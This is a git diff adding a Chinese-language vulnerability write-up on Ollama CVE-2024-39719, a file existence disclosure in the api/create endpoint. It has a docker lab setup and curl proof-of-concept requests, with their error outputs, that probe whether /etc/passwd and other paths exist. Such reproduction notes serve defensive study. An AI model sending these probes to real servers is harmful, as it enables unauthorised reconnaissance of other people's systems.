diff --git a/人工智能漏洞/Ollama 文件存在性泄露漏洞 CVE-2024-39719.md b/人工智能漏洞/Ollama 文件存在性泄露漏洞 CVE-2024-39719.md new file mode 100644 index 0000000..108cee9 --- /dev/null +++ b/人工智能漏洞/Ollama 文件存在性泄露漏洞 CVE-2024-39719.md @@ -0,0 +1,84 @@ +# Ollama 文件存在性泄露漏洞 CVE-2024-39719 + +## 漏洞描述 + + Ollama 0.3.14 及之前的版本中,攻击者可以通过 `api/create` 端点触发文件存在性泄露(File Existence Disclosure)漏洞。当调用 `CreateModel` 并传递一个不存在的路径参数时,服务器会直接返回 `"File does not exist"`(文件不存在)的错误消息。该漏洞允许攻击者探测服务器上特定文件是否存在,进而造成信息泄露。 + +参考链接: + +- https://github.com/advisories/GHSA-cpxh-jwhh-m496 +- https://oligosecurity.webflow.io/blog/more-models-more-probllms +- https://github.com/ollama/ollama/releases/tag/v0.1.47 +- https://github.com/ollama/ollama/blob/cb42e607c5cf4d439ad4d5a93ed13c7d6a09fc34/server/images.go#L349 + +## 漏洞影响 + +``` +Ollama ≤ 0.3.14 +``` + +## 环境搭建 + +docker-compose.yml + +``` +services: + ollama: + image: ollama/ollama:0.3.14 + container_name: ollama + volumes: + - ollama:/root/.ollama + ports: + - "11434:11434" + +volumes: + ollama: +``` + +执行如下命令启动 Ollama 0.3.14 服务: + +``` +docker compose up -d +``` + +环境启动后,访问 `http://your-ip:11434/`,此时 Ollma 0.3.14 已经成功运行。 + +![](images/Ollama%20文件存在性泄露漏洞%20CVE-2024-39719/image-20250305134942768.png) + +## 漏洞复现 + +使用 `curl` 命令向本地服务器发送请求,创建一个名为 `file-leak-existence` 的文件。 + +文件不存在时,将报错 `no such file or directory`: + +``` +curl "http://your-ip:11434/api/create" -d '{"name": "file-leak-existence","path": "/tmp/non-existing"}' +----- +{"error":"error reading modelfile: open /tmp/non-existing: no such file or directory"} +``` + +![](images/Ollama%20文件存在性泄露漏洞%20CVE-2024-39719/image-20250305135226934.png) + +文件存在时,将报错 `command must be one of "from", "license", "template", "system", "adapter", "parameter", or "message"`: + +``` +curl "http://your-ip:11434/api/create" -d '{"name": "file-leak-existence","path": "/etc/passwd"}' +----- +{"error":"command must be one of \"from\", \"license\", \"template\", \"system\", \"adapter\", \"parameter\", or \"message\""}% e +``` + +![](images/Ollama%20文件存在性泄露漏洞%20CVE-2024-39719/image-20250305135433566.png) + +传入目录而非文件路径时候,将报错 `{"error":"read /xxx: is a directory"}`: + +``` +curl "http://your-ip:11434/api/create" -d '{"name": "file-leak-existence","path": "/etc"}' +----- +{"error":"read /etc: is a directory"}% +``` + +![](images/Ollama%20文件存在性泄露漏洞%20CVE-2024-39719/image-20250305135606639.png) + +## 漏洞修复 + +- 升级至最新版本 https://github.com/ollama/ollama diff --git a/人工智能漏洞/images/Ollama 文件存在性泄露漏洞 CVE-2024-39719/image-20250305134942768.png b/人工智能漏洞/images/Ollama 文件存在性泄露漏洞 CVE-2024-39719/image-20250305134942768.png new file mode 100644 index 0000000..7bf9870 Binary files /dev/null and b/人工智能漏洞/images/Ollama 文件存在性泄露漏洞 CVE-2024-39719/image-20250305134942768.png differ diff --git a/人工智能漏洞/images/Ollama 文件存在性泄露漏洞 CVE-2024-39719/image-20250305135226934.png b/人工智能漏洞/images/Ollama 文件存在性泄露漏洞 CVE-2024-39719/image-20250305135226934.png new file mode 100644 index 0000000..04aa45c Binary files /dev/null and b/人工智能漏洞/images/Ollama 文件存在性泄露漏洞 CVE-2024-39719/image-20250305135226934.png differ diff --git a/人工智能漏洞/images/Ollama 文件存在性泄露漏洞 CVE-2024-39719/image-20250305135433566.png b/人工智能漏洞/images/Ollama 文件存在性泄露漏洞 CVE-2024-39719/image-20250305135433566.png new file mode 100644 index 0000000..8ebca51 Binary files /dev/null and b/人工智能漏洞/images/Ollama 文件存在性泄露漏洞 CVE-2024-39719/image-20250305135433566.png differ diff --git a/人工智能漏洞/images/Ollama 文件存在性泄露漏洞 CVE-2024-39719/image-20250305135606639.png b/人工智能漏洞/images/Ollama 文件存在性泄露漏洞 CVE-2024-39719/image-20250305135606639.png new file mode 100644 index 0000000..5a61a5c Binary files /dev/null and b/人工智能漏洞/images/Ollama 文件存在性泄露漏洞 CVE-2024-39719/image-20250305135606639.png differ